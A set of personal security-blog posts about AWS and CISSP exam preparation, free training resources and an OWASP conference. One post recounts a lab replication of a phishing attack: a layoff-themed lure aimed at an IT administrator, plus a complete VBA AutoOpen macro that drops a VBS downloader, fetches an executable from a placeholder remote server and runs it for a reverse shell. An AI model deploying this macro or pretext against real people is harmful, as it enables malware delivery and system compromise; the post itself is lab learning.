Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimal sometimes like four, tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending exam this time! There was maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like play Russian roulette. I changed about 9 answers total each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only say 50% of the questions are single choice. The others are select the best 2, 3 out of 6,7 selections. The questions are random from a bank like most of the exams so I’m not sure if same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

Majority of the exam was exactly that reading, understanding policies – IAM, KMS, Bucket policies you better be able to read and understand them as if they were plain English. There was a ton of KMS related things, make SURE you know the nitty gritty like imported key material, all the different type of KMS encryption types when, where, rotation ect.

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor 😂 (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I brought myself AWAE as a birthday gift I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

Free Cyber Materials BC Of Covid

11 April 2020 at 11:20

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on and I wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others 👊🏼💯 Hats off to these organizations since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe 📿🙏🏼

 

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you

The post Free Cyber Materials BC Of Covid appeared first on Certification Chronicles.

Pharm Raised Phish 😅🤠

31 March 2020 at 15:55

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch since there was a power outage and sadly I didn’t copy running-config to startup-config. Off my switch is basically everything besides wireless. My ESXI lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLS and VLANs 🤣 Took me about a week to update (and save) switch configuration, cleanup my NAS, cleanup all my machines & VMs, destroy my ESXI lab and rebuild it. Just like before my ESXI lab simulates a corporate network, active directory environment with an assortment of machines running various services. I use PFSense as a virtual firewall/router. This allows you to simulate someone attacking over the WAN and having your LAN protected by a security device just like normal. You can google security courses, CTFs, to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful we all have to spend the time to stand things up before we can even begin to start thinking about playing around.


Keeping Busy:

I begin to think about what I want to learn more about. I find an Advanced Penetration book focusing on adversary emulation and APTs that I fell in love with. It’s ironic as well because the only reason this book stood out was it was only 230 pages. I thought damn either this things is complete garbage and captures .01% of something irrelevant that some other guy loved or it’s chock full of gems. It was the latter! My heads spinning as we write our own VBA dropper, that writes a VBS file to the disk, that download the payload and execute reverse shell. At the end of chapter one we’re on writing your own C2C infrastructure implementing libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! Progressively improving our payloads and infrastructure as it progresses. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

  1. Somehow through password reuse you’ve gained access (attacker) to an organizations webmail login
  2. As a budding hacker you understand situational awareness. Your target is an IT Administrator – whom is probably already a little concerned over his job security. Since through
    reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
  3. You craft a fake Word document that seems to be a notice of this months layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document it’s a blurred image and enabling macros is going to begin and carry out the compromise. Is looks like this



    Payload:
    Sub AutoOpen()

    Dim PayloadFile As Integer

    Dim FilePath As String

    FilePath = "C:\tmp\payload.vbs"

    PayloadFile = FreeFile


    ' Create VBS dropper, write it to disk and execute it. VBS reaches out to remote server downloads payload and executes it.

    Open FilePath For Output As PayloadFile


    Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""

    Print #PayloadFile, ""

    Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"

    Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"

    Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"

    Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"

    Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"

    Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"

    Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"

    Print #PayloadFile, " strFile = myPath"

    Print #PayloadFile, " End If"

    Print #PayloadFile, ""

    Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"

    Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"

    Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"

    Print #PayloadFile, " objHTTP.Send"

    Print #PayloadFile, ""

    Print #PayloadFile, " res = objHTTP.ResponseBody"

    Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"

    Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"

    Print #PayloadFile, " objFile.Write currentChar"

    Print #PayloadFile, " Next"

    Print #PayloadFile, " objFile.Close( )"

    Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"

    Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE""

    Print #PayloadFile, " End Sub"

    Close PayloadFile

    Shell "wscript c:\tmp\payload.vbs"

    End Sub


  4. The administrator viciously open the email, macro detonates, payload execute and you get your reverse shell.

Now that we got a way to execute payloads now on to converting the payload into a C2 host and setting the infrastructure! Here’s a videos of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.

The post Pharm Raised Phish 😅🤠 appeared first on Certification Chronicles.

Slayed CISSP

15 March 2020 at 23:03

I saw this day a countless amount of times in the last two months. Typing this blog post after passing the exam, is a surreal feeling. Forecasting a goal, envisioning its completion, and driving it home is the things fairy-tales are made of. How the air smells at that time? What does it taste like? Why I deserve it? How all the countless hours of study I am willing to endure would eventually lead to pay-dirt and once again, me on top! Triumphant. How relieved I’d be? How much elation I’d be feeling. Like having a superpower to force anything I want into existence. Gotta have that vision!

I’ll get to what studying looked like, felt like, exam review dialogue and such soon. Yes! This post is LONG. But guess what I’m the one who had to write it. I didn’t do it for myself, I did it for you. The length was dictated by however many words I needed to produce a post with the context of what I would have wanted in hindsight after passing the exam. Most of the blogs I see are humble brags of people looking for everyone to kiss their feet since they passed it. Some are really good like the ones at the end of the post. Some are long and list out key things you should be on the lookout like CMMI or BCP without any other context. Continuing by saying how it was the MOST difficult test of their life, they felt like they were going to fail when the test ended. I just don’t think this is or has to be the typical case. Anyone can pass CISSP – keep reading and I’ll detail how to study and why most of the practice materials are broken. You could extrapolate something out of that too (if you only use the recommended study materials you will fail).

The point needs to be restated that I think the journey is the most valuable portion of attempting certifications not the actual cert. This one for instance, proves you are not only familiar with all the content from the 8 domains, but also, able to synthesis and apply it to scenario-based situations using sound risk management principals acting as an Information Security Manager. Not only do I want to provide a valuable resource for exam preparation but also give you insight and texture into my life during the entire process.

Part-1: What’s My Motivation?

Time: Late December 2019

Self Introspection (self observation) – is important as it’s a kind of regular check on self development which helps you to know what we have achieved so far.

I was promoted in December 2019 to Application Security Manager 😛 (for context). Christmas is a really special time in the Caribbean so I try to be there every year during that holiday period. (That’s how you end the year baby 👊🏽) So literally the next day after getting home from the trip (still having a week off before I go back to work) I start to get the feeling. Anybody know what I’m talking bout? The thirst? Watch TV for maybe a few hours, go out a day, chill then it’s like “What am I doing with my life? What’s all this idle time I have? How do normal people do nothing for most of their lives? Happens to me every time 💯

I had preconceived thoughts about CISSP honestly. “It’s typical to fail on first try” … “It’s a management exam” … “It’s an inch deep mile wide”  … “Reddit horror stories”  … “Folks literally studying on average 6 months some 1 year”. After doing some research I decided it was the one for me. Not only would it give some sort of legitimacy to my new position, it would, in addition, significantly broaden my understanding of Information Security and Risk Management.

I ordered the following studying materials the same day based on research from CISSP sub-reddit:

Major S/O to that sub it’s a trove of information! That’s part of why blog. As to keep this process continually flowing. Provide helpful materials to those after you.  We have to realize 90% of the time we’re acting as consumers not producers. I think it takes a certain level of appreciation for the field overall to be devoted to giving back in whatever form you can. We all have something we can contribute ‼

Life happened and I wasn’t able to start studying immediately. Shame because I got a free same-day delivery of the books. I never even opened the package when it came. Put it in my office and it sat there for most of January.

Part-2: What Was The Preparation Like?

Time: End of January 2020

Thinking about sports and basketball in particular – How many free throws might a average player shoot per day when trying to improve their percentage? 50 free throws per day? 100? 500? That number may actuality be well around 2 thousand or more. Now lets abstract that a little and dumb it down for a second. It’s not going to be anything novel. You need to consistently be shooting your free throws. In this case it all the practicing, reading all the materials from different sources, doing more practice questions, flashcards it’s all apart of the process. You can’t go a weekend without studying, or even a day. Consistently & repeatedly!

You guys know by now, there’s nothing special about me I just feel like when I really want something there an insatiable thirst to quench and borderline obsession maybe for me to get it. I guess what I’m trying to say is I know how to “Lock In”. I literally had hundreds of unanswered LinkedIn messages, DMs, text everything. I cut everybody off and focused at the task at hand. It would need my upmost attention at all times. There’s absolutely no going out, minimal TV, if I’m commuting I’m reading, if I’m on break I’m reading or researching, when I get home I’m getting settled at say 5 pm and then grinding till I’m dosing off. In bed i’m reading. When I wake up before I get out the bed I’m reading. Around this time is when you realize you could live with someone and be a complete stranger to them in the same house 😂 So some of the attributes that describes someone in this stage is consistency, dedication, resolve, discipline, resiliency.

You have to REALLY want it. When you do you are laser-focused. As random as this is I see myself in my head as i’m typing this as heat-seeking missile. I’m coming in hot and I will not miss! I care about accuracy and precision. You get the picture. Whatever it means to you – “Lock In” that’s the mode you need to be in – keeping in mind it’s a marathon not a sprint. Life will happen some days you’ll be much more motivated than others – but anything in your control better be related to CISSP.

  • Sybex Official Study Guide 8th Edition  (8/10) – This behemoth took me about 2 weeks to finish. I didn’t read it intently but more skimming and identifying what I absolutely don’t know, or if I know something’s right for the wrong reason. You can register the Sybex book along w/ the practice test on the Wiley test bank. It allows you to take the chapter questions in the exam atmosphere instead of writing in the book as well as practice exams. All your work is tracked and saved. After I finished reading the book I registered it and proceeded to go thru each domain’s chapter questions. I would say my average was in the 60’s for most of them. Bunch of new material, definitely vast amount of knowledge you need for every single domain. I was familiar with the SDLC / Security Testing / IR domains from work related experience. Gets two dings for being so damn big. Very useful but again it’s not something you can use alone to pass exam despite it being the “Official Study Guide” 🤔
  • Kelly Handerhan’s (9/10) – Sadly these aren’t free anymore 😥 She really does an amazing job of relaying complex topics in easy digestible manner. She also gives you the 2nd half of what you need to pass, the mindset. Even with the recent price change I still think this worth however much it cost. You won’t read one Reddit or ISC2 post that doesn’t mention her. Gets a ding since you can’t alone pass exam with this.Scored low on my first Sybex Practice after her videos. I spot checked which domains I was coming up short in and went back to read it in the Sybex book again.
    Boson Test Engine (8/10) – One of the most valuable resources. Great bank of test questions that have amazing well written thorough explanations. The secret sauce here is no matter if you get an answer incorrect or not you read the explanation. You’re confirming here if you were right for the wrong reason, or why you were wrong, or in what scenarios may one of the answer could possibly be right in another situation. That’s the beauty of Boson. This helps you identity where you’re weak. Guess what you do after? You use the book or another source (tons of material out there) to better understand whatever it is.The reason Boson gets 2 dings is that the beauty is in their explanations not necessarily the questions. Which in hindsight are way to technical. Which are reminiscent of all the study material test.
  • It’s now about mid-February and a blessing falls from the sky directly into my lap. I find my MOST valuable resource.
    Discord CISSP Server (12/10). This type of forum was perfect for most of my learning when tackling technical certs so I knew it would push me here. We’re equally amazing but some unmatched wisdom in there for sure! This drastically improved the amount of information you retain as well as increase the depth of such information respectively. I think this is the case because you’re not just you in your head alone in your room with a book. You’re now defending your argument on a particular question, or understanding why you’re wrong, this goes on 24/7 since the group is global. 4 pm EST or 4 am there’s going to be active discussions ALWAYS going on. There’s a psychological aspect to this as well. Feeling like you’re alone in a fight is depressing. Having an active army of mission-oriented soldiers all ready to fight, defend and operate 🔫 ?! Oh now this is a whole different story! Don’t underestimate the power of a topic being explained to you by a person instead of a blog post. I’ll forever be apart of this channel – definitely my new brothers and sisters. Blame most of me passing on them!
  • I start to do a million practice questions from anything I could find books, practice sites, old materials. I guestimate I did over six thousand practice questions. I can remember off hand doing 1300 in a 2 day hiatus 🧾At this point I’m at about 5 hrs a day on weekdays and at least 12+ hrs on weekends #overdrive
  • Sari Green’s CISSP (9/10) course. Decided to change the pace a little bit. This was awesome very helpful with the most important thing being she delivers the material with a strong risk management undertone. Another thing was how she aligned the entire course based on the sections in the CISSP domain outline. Gets a ding since the material is about 5 years old so it misses new information about some of the topics. Like IOT SCADA Embedded Device. Recommended.
  • Mike Chapple LinkedIn Learning CISSP (9/10) course. Very good! The course is taught in a way that isn’t typical of what you’d expect in a CISSP course. The way he provides practical realizations of the topics to seal it in is incredible. You can remember PGP until the cows come home get hit with a question and totally only know that PGP stands for Pretty Good Privacy 😂 memorization won’t help you in the exam. He shows you in real-life implementations of the exam topics. Wonderful course.
  • After I finished all those I started from domain one and did the following for all 8 domains
    • Read Sybex chapter summary
    • Read 11th hr chapter summary
    • Watch Sari domain summary
    • Do Mike Chapple practice questions for associate domain
  • We’re at about 2 weeks out now time wise. I started to read all the NIST documents related to the major processes in the various domains. These actually were well written and I learned to love them. Every night I would open them and try to relate everything I was doing back to risk management. I’m still doing practice problems but maybe like 10 a day at this point. Most of my time is spent trying to understand the SDLC in depth, the IR process in depth, the BCP/DR process in depth. You not only need to understand the order of the processes but all the details & outputs that come from each.
  • (Maybe one month ago 2 member of the squad from Discord discovered we all have the same exam date) The day before exam I get hit up to join a conference with both of them to do so last day studying. Without this I wouldn’t have passed. We spend 10 hours going over all the major processes, ironing out our understandings and tying relate everything back to the RMF. It’s 10 pm night before exam and boy I’m thinking I probably shouldn’t have did all of that studying today in fear of cramming and losing it. I’m also pissed at myself for drinking a redbull 30 minutes earlier. Because I should be sleeping but a hr has gone by and I’m still wide awoke – I hope I get to sleep soon in fear of not getting good rest and failing.

Part-3:  You Didn’t All This Work For Nothing, Did You?

Time: Mid-March 2020

When I scheduled my exam I purposely chose a Saturday morning. I did not want to deal with the variables that a “normal” morning commute might include – so I was going to be lazy and Uber to the testing center. Now being so paranoid I just drove there and paid the crazy fee to park in the garage. I listened to Kelly’s “Why You Will Pass The CISSP” video and Larry Greenblat “CISSP Exam Tips” videos before leaving the car. Crazy only seeing about 4 people when on a regular day – a low amount normally would be around 50-100 and tons of traffic at any given time – people jogging, women pushing strollers, people and their dogs, as well as tons of business folk – it’s directly across the street from a train station.

At this point, the sports reference is to boxing. Here’s my thoughts walking to from the garage to exam center – “You did not come this far to lose did you? You’ve been wrong countless amounts of time on Discord and understood why. You worked your buns off! You learned the material, the mindset, you’ve watched hundreds of videos, did thousands of questions, read tons of pages. You’ve got some of the most distinguished practical offensive certs in existence, are you going to let a multiple choice management exam that most people fail because they don’t slow down to read defeat you? You’re going to knock this exam on it’s face. You already visioned this day many times before.  This is going to turn out just like all the other times – you put in the work and the results are going to prove such is true at the end. If you synthesized the information the way you think you do you’re going to do amazing” This is how I’m I’m trying to make myself feel

In reality I’m scared as shit about this exam 😂 it’s not that I don’t the material – its I don’t know what I don’t know. Most people on Reddit say when they see the first 25 questions they sometimes wonder if the proctor configured them for the wrong exam 😌 Here’s what calmed me down sorta grounded me. I had small talk with a guy as we’re walking to bathroom and we ask one another what we’re up against this morning. Turns out him along with 90% of the other people there (16 total) were taking their medical exam. It was 7 hrs! I literally said to myself “Shitttt boy you got it good!” 🤣 It’s all relative 💭 My number gets called and I get seated for the exam. They had disposable covers for the noise cancelling headphones 🤞🏽

I had this plan to write all my brain dump stuff on the pad they gave me before starting. You get 5 minutes to read and sign NDA. One of the things I wanted to write down was the forensic process. I started to list them out and got stuck after the “Collection” phase – It’s scares the living fucking daylight out of me. I said “F-This” and clicked “Start Exam” true story 🤦🏽‍♂️

Part-4: Put Up Or Shut Up!

The questions didn’t seem like they were designed to trick me. I was comfortable with the terms in most questions. The difficulty is in the subjective and vague nature of all the questions. Unlike the practice question which test if you know terms and definitions, the exam places you in scenarios where you play from the perspective of a security manager and have to apply sound risk management principals – remembering your job is to reduce risk, provide information for senior management and apply the appropriate level of protection to your assets depends on their value and classification. Most of the questions are BEST, LEAST, WORST with all the possibly choices either being all right or all wrong. On a bunch of occasions I was able to eliminate 2 off the jump. The remaining 2 choices are what’s going to keep you up at night. I got a crazy subnetting question that I attempted to start breaking down on my pad to binary and do the power of 2’s after 20 seconds I said “F – This” and clicked “Next“. There were some gimmie’s sprinkled in there as well. Don’t forget “inch deep, mile wide” it’s way too much material for every single question to be a boulder. I made sure to slow down scrutinize every word in the questions, re-read all questions and answers and reading back the answer I chose. If a question was “Blah blah blah .. Which of following feature of Digital Signatures would BEST provide you with a solution to prevent unauthorized tampering?” … And the answer is integrity … Before moving on I’d say “Integrity is the feature of Digital Signatures that best provide the solution to the problem” … Here’s what I saw most followed by question to illustrate the context for each one:

  • SDLC Related – What SDLC is Change Management most likely to be apart of?
  • BCP Related – A global pandemic of a deadly virus is on the brink. How does the BIA help you determine your risk?
  • IR Related – The sky is falling and something just hit you in the head. What process of IR are you most likely in?
  • Bunch of stuff on Access Controls – How can i best protect this if that?
  • One question of Encryption – Understand PPP L2TP PPTP L2F their succession which ones can use IPSEC, EAP
  • Bunch of Risk Management – Something just happened you need to do something. With these constraints. What’s best?
  • Asset and Data Classification/Security – Why do we classify anything?
  • Web Application Attack Recognition – Seeing and recognizing attacks described through a scenario or graphical depiction
  • US and Global Privacy Frameworks – GDPR – ECPA – OECD
  • Roles and Responsibilities – Who’s MOST important for security? CISO CEO ISM ISSO?
  • Communication & Network Security – What layer is LLC most likely apart of ?

I was nervous as hell clicking “Next” on the 100th question. I knew if exam ended I either did really well or really horribly also if it continued I knew I was exactly on the borderline and could still pass up to 150 but each question would have to be correct. If that was the case I wouldn’t have been pissed but I didn’t want that to occur to even have to be in that situation. The exam stops. I’m like “HOLY SHIT”. I get the TA’s attention, she signs me out and I go to the reception area to get the print-out. The receptionist was at the bathroom 😫 had to wait 5 minutes for her to come back. I was pacing so much the entire time I probably could have burned a hole in their damn carpet. The lady takes my ID and prints it out the result, peaks it, folds it and gives it to me looking me dead in the eye with a straight face. But I did notice it was one piece of paper and people said if you get one paper you pass – if you get more it’s because you failed and that’s the explanation of the domains you came up short in. I opened it and saw I had PASSED 😍 I threw the wildest air punch in history, luckily didn’t hurt myself, jump up and down a little (nobody else in reception area at this point, say “LET’S GO” as loud as I can (since the students are literally just around the corner) and notice the receptionist now smiling so said “Congratulations sorry I had to mess with you” 😂 Here’ it was guys that moment of passing that I visioned! Slaying the dragon. What a wonderful feeling 💘

Part-5: Thoughts?

If you’ve made it this far s/o to you! I’ll never write a TL/DR ever ✌🏽 The context matters … The journey matters.

My biggest advice would be to make the NIST RMF, SDLC and all the related documents your friend. These are going to help you substantially more than doing a zillion practice questions or reading the huge books. Also it sheds light on why so many smart technical folk fail this exam the first time. The day before the exam me @Beedo @Reepdeep MAJOR S/O TO THOSE GUYS – WHO ALSO PASSED THE SAME DAY studied from 1 pm to 10 pm going through all the processes from each domain, in our own words, understanding the steps to the process but understand how every single thing is tied back to risk management.
NOTE: We think the document we created could help everyone out there out as a definitive source for passing the exam. Obviously folks need to get back to the real life and people they’ve neglected since beginning the journey but it’s something we all feel strongly about and want to provide to the community hopefully soon 😎

Part-6: Things I Shared on Discord That I Think Should Be Included Here?

These are just excerpts but I figured they maybe valuable since you forget basically everything related to the exam afterwards.
Bear with me as the grammar may not be perfect it’s Discord so I’m not necessarily caring if I make a mistake to correct it. It’s conversational texting-like language. Most of it being typed from my phone.

In regards to the difference in seemingly all the practice material vs real exam:

“I see why all the practice material miss the mark. It’s because you truly need a intelligent person to be able to spend the time to make those questions and that person cost too much to write free questions on the internet for us .. Those aren’t ones you come up with based on a definition .. You understand someone thought deeply about this, so much so they knew the answer I’d immediately go for (and it’s wrong) is included as say answer A and make the right answer further down the list like D. You need to be very careful. Also saw 2 similar looking answers where you jumped immediately to the answer and didn’t thoroughly read it would have noticed the 2nd one further down was more right”

In regards to our day before exam study conference: 

it was impromptu as hell I was just going each of my Boson question explanation. It lasted lot longer than expected 😵🥴 went from like 1-10 yesterday on conference, went over each process understanding it and connecting the SDLC steps BCP steps back to RMF I’m sure they’ll agree understanding how everything relates back to RMF is the way to pass. Not technical … Not all the questions … Since they’re way to technical (use em to identify and reinforce you’re weak areas) we were already studied up at that point … Sybex/Boson/AIO/All the sources questions way to hard if we talking scope for exam. You’ll be placed in a bunch of situations where you’re somebody in security what’s BEST LEAST solution for this scenario.

On depth of question and context. Keep in mind we already knew the blocks lengths, key size ect:

For context it’s like understanding AES is a strong symmetric algorithm, DES is a weak one that shouldn’t be used. But not that 3DES EEE has a xyz length bit size and it goes through xy rounds – the latter is unnecessary .. If you know it so be it but that’s how I would scope everything. High level and how does is connect back to RMF .. I would read the RMF and SDLC NIST doc every night

On what I think is useful studying:

I’m saying you’ve read Sybex or over big book feel comfortable been browsing reddit know the sources the videos and all the questions we do here then can go through the 11th hr and understand everything then I would focus on the processes and how it relates to RM SDLC, IR, BCP knowing how those relate was my entire exam. I had a bunch of SDLC stuff lot of OWASP what vulnerability is this? Few question from domain 4 IPSec and understanding the protocol or layer.

Overall exam tips and thoughts:

“The exam was tough but I didn’t feel any point they were trying to trick or deceive me, every question was able to eliminate two answers of back. Some of the answers are similar then you figure out differences which was slightly hard in some cases some not. Felt familiar with all the terms answers. Question were clear. I didn’t even notice the experimental which I was on look out for. I think when studying we equate inch deep mile wide to difficult. In reality it’s just understanding how the domains work together. Remember every question CANNOT be a boulder. There were some gimmes… what is encryption… what is integrity for digital signatures type stuff. My best advice in hindsight with the above is DO NOT WASTE YOUR TIME doing all these questions, Boson, Ccure, Luke, Sybex. All of them! Only if you’re weak. If you can read 11th hr and notice everything nothings a shock stop. Understand how everything is bound by risk management. Btw I didn’t use the whole mgr mindset I just tried pick best 2 remaining options. There were plenty of answers that were “doing something” I threw those out automatically”

On how I would study differently:

“don’t worry and spend some time in the nist document’s 800-64 800-37 they all link to each other. So your thinking going through say SDLC is what am I doing in this step and how does it relate back to the RMF everything relates back to it. For example that in phase one of  the SDLC you have your requirements and stuff but you’re also initially understanding the systems that links back to step one in RMF which is Categorize, so think does this system store transmit or processes pii, what’s the risk. Or step two Development in SDLC, you know you starting design architecture development and testing, that relates to steps 2&3 (you also do risk assessment here) in RMF you’re identified the need for the system in initial requirements, so now in development we select the controls of the system and assess them that’s in SDLC phase two but you’re always grounded by RMF. See how that relates? I think that understanding this alone is how I passed”

Are questions from sybex syllabus or out of the box?
Wayy to technical as well as all the practice questions

Some people fail who had boson?
Boson shouldn’t be used to judge readiness just identity weak areas. You could get 20% on all bosons and pass since it’s mostly thinking not technical

How’s the difficulty level?
NOT DIFFICULT – DON’T BELIEVE THE HYPE – ALL OF US COULD PASS THIS EXAM

Do we need other source of study hindsight?
Read the NIST documents on all the processes and reclaim some of your time back

You are say every in this group can pass, can you tell your experience and main domain?
Mainly offsec and I do appsec at work for like 4 years. I’m an engineer so i have the fix it mindset by default. You don’t need be expert in anything. Just think of everything in risk mgmt is enough to pass

How long you have been preparing?
Studying since 1/28

What was difficult domain for you?
Domain 2 smh – Focus on 1,3,7 thought and definitely 8.. Obviously you need to be passing in all domains but since those weighted more it more advisable

Did you face any language mixing puzzle questions means they use different vocabulary 
There were NO gimmicks every question i knew exactly what they wanted.

Do you think feedback from people different industry get it more difficult than security?
It’s your understanding and mindset. Kelly and Larry tell you the mindset. I automatically threw any answer out that was “disconnect from network, make a firewall change”.

Did you feel it’s purely management?
No. Because being in mgmt although you’re not a doer you need to have a solid understanding of the underlying area no matter what it is.”

S/O to my Discord guys ALL OF YOU 💗

I’ve included a section below on the links that were most valuable to me. Good luck & NEVER give up or give in!

Part-7: Links

 

 

 

 

 

 

 

 

The post Slayed CISSP appeared first on Certification Chronicles.

OWASP Global AppSec DC 2019 Review

23 September 2019 at 18:05

🙋🏽‍♂️ Hello friends! It’s been quite some time since I’ve blogged – shame on me. No excuses as I can’t say I’ve been particularly busy or engaged in anything mind-blowing. The truth is I haven’t had much to write about lately & I’m not going to deliver nonsense because then I would lose your trust. I err on the side of quality vs. quantity as I hope everyone reading this does. My quest to become a better developer is something that has been keeping me occupied lately. To that end, learning MEAN stack development is something I really want to get better at. How can I understand how to break something if I don’t know how to build it? It’s in its infancy but my goal is to build a vulnerable MEAN stack application and release it to Github for everyone to tear it apart and understand how the typical web application vulnerabilities manifest themselves in a MEAN stack application at the code level. No promises but I hope by the end of the year I could deploy the beta version. Enough updates let’s get down to the point of this post.

Having an awesome company isn’t something to take for granted. For me this means quality and diversity of work, culture, work environment and plenty things in between; but the biggest part of that is the investment the company provides you in terms of  self improvement and development. To say that I get spoiled currently is an understatement! Imagine how ecstatic I was to find an OWASP conference that was so close I wouldn’t even need a flight. I usually with puppy eyes ask my boss if it’s possible to attend, he runs it up the flag-pole and soon gives me the okay to book it. This would be my first OWASP conference & training.  The first 3 days there was an assortment of training’s followed by the last 2 day being the actual conference and a CTF. The training course that caught my eye was Seth & Ken’s Excellent Adventures in Code Review. The description read as follow

This was a tough to select since there were training on a bunch of things I was interested in including Serverless Security, API Security, Security in Single Paged App, DevOps Security, and Building a Appsec Program with OWASP. I wish I had like 5 clones and could take them all but such is life. I arrived Sunday night 9/8/2019 after a 3 hour train ride grabbed some food and made sure to get a great nights rest.

Training:

After an introduction from the instructors we were provided a USB (which proved to be safe but everyone questioned) to download the materials.  It included an OVA image of the VM we were going to utilize for the course. Essentially it was just a Ubuntu image pre-loaded with vulnerable application’s source code and ATOM IDE which is pretty slick. A giant portion of this day was determining the scope of code review and building a methodology. Having a solid methodology is uber important since given millions of lines of code to review of an unknown application, various frameworks or unfamiliar language can be a daunting task. A question I’d always ask myself is “where do I begin”. We learned how to perform an application assessment & overview. This is the first step where you profile the application beginning to understand things such as

  • Frameworks & Languages
  • 3rd Party Components
  • Techstack
  • Datastores
  • Checking Framework Documentation
  • Looking for Unit Test
  • Code Comments

Spending the time here proved most important and the most difficult. Naturally the hacker in you wants to start hunting for vulnerabilities and going down rabbit holes. Don’t Do This! Be disciplined is the only I can give you here.

Then comes information gathering

  • Mapping Route and Endpoints
    • We learning how request flow from the routing to authorization functions, processing logic through the DB and back to the user in a number of frameworks
      • Rails
      • NodeJS & Express
      • Django
      • .NET
  • Reviewing authorization decorators
  • Risk brainstorming
  • Sources and Sinks

From this you’ll have a checklist of things to review. That’ the methodology!
Using the information from above we dove into specific areas of the application (which in itself is sorta difficult to find).

  • Authorization
    • Broken Access Controls
    • Sensitive Data Exposure
    • Mass Assignment
    • Business Logic Flaw
  • Authentication
    • Broken Authentication
    • User Enumeration
    • Session Management Issues
    • Authentication Bypass
    • Brute Force Attacks
  • Auditing
    • Sensitive Data Exposure
    • Insufficient Logging & Monitoring
    • Debug Messages
    • Error Handling
    • Information Leakage
  • Injection
    • Injection
    • XXE
    • XXS
    • Redirects
    • SSRF (recently popular I wonder why)
  • Cryptography
    • Lack of Encryption
    • Improper Encryption
    • Insecure Token Generation
  • Configuration Review
    • Security Misconfigurations
    • 3rd Party Libraries, Frameworks, Dependencies

After lunch on the last day we broke off into groups, selected an open source application and followed the process from start to finish. We were hoping for some CVE’s but we didn’t come up with anything shocking. I love when you have practical sessions like this. You’d be surprised how much you learn by doing instead of just listening. All the groups presented their findings to the class at the end.

Conference:

The keynote started off with an pretty amazing guy technical Director of Security from the NSA Neal Ziring – Applying Security Engineering Principles to Complex Composite Systems
Here are some of the talks I attended:

  • A Structured Code Audit Approach to Find Flaws in Highly Audited Webapps
  • Using the OWASP Application Security Verification Standard 4.0 to Secure Your Applications
  • Securing Serverless by Breaking-in
  • Owning the Cloud through SSRF and PDF Generators
  • DevSecOps: Essential Pipeline Tooling to Enable Continuous Security
  • The As, Bs, and Four Cs of Testing Cloud-Native Applications
  • OWASP Serverless Top 10
  • Farewell, WAF – Exploiting SQL Injection from Mutation to Polymorphism

Final Thoughts:

